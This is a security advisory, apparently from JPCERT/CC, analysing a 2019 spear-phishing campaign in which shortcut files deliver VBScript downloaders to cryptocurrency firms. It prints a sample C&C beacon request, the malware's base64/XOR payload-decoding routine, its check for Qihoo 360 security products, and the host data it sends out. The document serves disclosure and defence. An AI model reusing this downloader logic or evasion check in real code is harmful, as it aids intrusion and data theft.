Spear Phishing against Cryptocurrency Businesses
As of June 2019, JPCERT/CC has observed targeted emails to some Japanese organisations. These emails contain a URL to a cloud service and convince recipients to download a zip file which contains a malicious shortcut file. This article will describe the details of the attack method.
How the VBScript downloader is launched
The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file “Password.txt.lnk”. This shortcut file contains some commands, and they run when the file is executed. The below image illustrates the flow of events from the shortcut file being executed until the VBScript-based downloader is launched.
The shortcut file contains the following command:
When a user accesses the shortened URL, they will be redirected to the following site, and an HTML file containing the VBScript (Figure 2) is downloaded.
The behaviour of the VBScript is described in Figure 3. First, it creates and displays a text file that contains the password for the decoy document. Then, it creates a VBS file (oezjrjua.vbs) in %TEMP% directory and executes it. It also lists the processes running in the environment and checks whether any of them contains specific strings ("hudongf" or "qhsafe"). If these are not included, then a shortcut file (xBoxOne.lnk) is created in the Startup folder. It is assumed that this process is meant to check strings that Qihoo 360 security products contain (zhudongfangyu.exe, qhsafemain.exe).
Details of xBoxOne.lnk
xBoxOne.lnk is a shortcut file and contains the following command:
When a user accesses the shortened URL, they will be redirected to the following site:
This shortcut file is created in the Startup folder and executed when the login is processed. As of 26 June 2019, JPCERT/CC was not able to confirm the details of the site as the hostname could not be resolved.
Details of oezjrjua.vbs
oezjrjua.vbs is a downloader which sends a POST request every 3 minutes and executes the received data as VBScript. The following is an example.
POST /open?topics=s9[random 3-digit numeric] HTTP/1.1 Accept: */* Accept-Language: ja UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 126.96.36.199:8080 Content-Length: 7426 Connection: Keep-Alive Cache-Control: no-cache 200
Details of VBScript downloaded by oezjrjua.vbs
JPCERT/CC has confirmed that the VBScript (Figure 4) is received and executed in response to the POST request from oezjrjua.vbs.
The executed VBScript collects information of the infected device and sends it to the attacker’s server every minute. The following information is sent:
- Host name
- OS version
- OS install date
- OS run time
- Time zone
- CPU name
- Execution path of oezjrjua.vbs
- Network adapter information
- List of running processes
If the response to the data contains “20”, encoded data will be downloaded. It can be decoded with the following codes:
n=InStr(1,res,"#") // Finds # in the response key=CLng("&h" & Mid(res,1,n-1)) // Extract the key psc=Mid(ret,n+1,Len(res)-n) // Extracts encoded data sc=base64dec(psc) // Base64 decoding (1st time) psc=CStr(xor(sc,key)) // XOR processing on the key NStep=base64dec(psc) // Base64 decoding (2nd time)
The decoded data is expected to be VBScript, and it will be executed when it is correctly decoded. As of now, we have no clue about what kind of malware will be downloaded as a result since the encoded data is not accessible. It is assumed that attackers would inject some malicious files according to the victim’s environmental information .
Access to the shortened URL
JPCERT/CC observed a limited number of access to the shortened URL (Figure 5). This implies that the attack was conducted against a very limited range of targets.
In this series of attacks, we have observed that attackers change some parts of encoding and conditions for each attempt. It is likely that this type of attack continues with some customisation. Details about the shortcut file is available in Appendix A, list of samples in Appendix B and C&C servers in Appendix C.
The hash values and C&C servers of some variants are listed in Appendix D and E . Please make sure that none of your devices is communicating to the C&C servers listed in Appendix C or E. These samples were mostly decoy documents with subjects about cryptocurrency. We are aware that some of these documents have been sent to organisations that are related to cryptocurrencies. We assume that this attack campaign specifically targets cryptocurrency operators and related entities.
(Translated by Yukako Uchida)
Appendix A Shortcut file information
|Drive serial number||fe42-66e0|
|Drive serial number||1aee-e0bd|
Appendix B SHA-256 Hash value of the samples
Appendix C List of C&C servers
Appendix D SHA-256 Hash value of the similar samples
Update: Nov 20, 2019
Appendix E C&C servers of the similar samples
Update: Nov 20, 2019